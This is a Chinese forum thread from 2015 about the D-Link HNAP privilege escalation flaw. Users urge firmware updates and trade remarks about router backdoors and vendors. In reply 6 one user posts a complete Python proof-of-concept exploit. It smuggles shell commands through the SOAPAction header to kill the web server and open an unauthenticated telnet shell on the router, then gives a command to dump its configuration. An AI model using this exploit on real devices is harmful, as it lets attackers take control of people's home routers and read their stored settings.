这是一个创建于 3240 天前的主题,其中的信息可能已经有所发展或是发生改变。
HNAP Privilege Escalation Vulnerability
看看自己的路由器有没有出更新的固件。
先去更新我的 D-Link Dir-850L
看看自己的路由器有没有出更新的固件。
先去更新我的 D-Link Dir-850L
7 条回复 • 2015-06-03 14:39:32 +08:00
 |
1
lhbc 2015-06-03 02:56:32 +08:00 via Android
国产的全都有后门,还用查……
|
 |
2
princeofwales 2015-06-03 08:24:44 +08:00
网件的会不会有问题,美帝的
就是怕了国产的,再便宜都不想买 |
 |
3
lee015 2015-06-03 08:34:01 +08:00 via Android
刷了开源固件还会有问题吗?
|
 |
4
ledzep2 2015-06-03 10:28:44 +08:00
现在电信联通连个公网ip都不给, 想访问都找不着. 洗洗睡...
|
 |
5
Karblue 2015-06-03 14:27:12 +08:00
不是只影响Dlink么。国内厂商好像没有躺枪吧
|
|
6
Karblue 2015-06-03 14:32:04 +08:00
#!/usr/bin/env python
import sys import urllib2 import httplib try: ip_port = sys.argv[1].split(':') ip = ip_port[0] if len(ip_port) == 2: port = ip_port[1] elif len(ip_port) == 1: port = "80" else: raise IndexError except IndexError: print "Usage: %s <target ip:port>" % sys.argv[0] sys.exit(1) url = "http://%s:%s/HNAP1" % (ip, port) # NOTE: If exploiting from the LAN, telnetd can be started on # any port; killing the http server and re-using its port # is not necessary. # # Killing off all hung hnap processes ensures that we can # re-start httpd later. command = "killall httpd; killall hnap; telnetd -p %s" % port headers = { "SOAPAction" : '"http://purenetworks.com/HNAP1/GetDeviceSettings/`%s`"' % command, } req = urllib2.Request(url, None, headers) try: urllib2.urlopen(req) raise Exception("Unexpected response") except httplib.BadStatusLine: print "Exploit sent, try telnetting to %s:%s!" % (ip, port) print "To dump all system settings, run (no quotes): 'xmldbc -d /var/config.xml; cat /var/config.xml'" sys.exit(0) except Exception: print "Received an unexpected response from the server; exploit probably failed. :(" POC在此。从devttsy0大神po来的 |
|
7
Karblue 2015-06-03 14:39:32 +08:00
还发现了devttsy0的吐槽。吐槽Dlink的补丁。看了一下神tm补丁打的真是捉急
http://www.devttys0.com/2015/04/what-the-ridiculous-fuck-d-link/ |
Select Language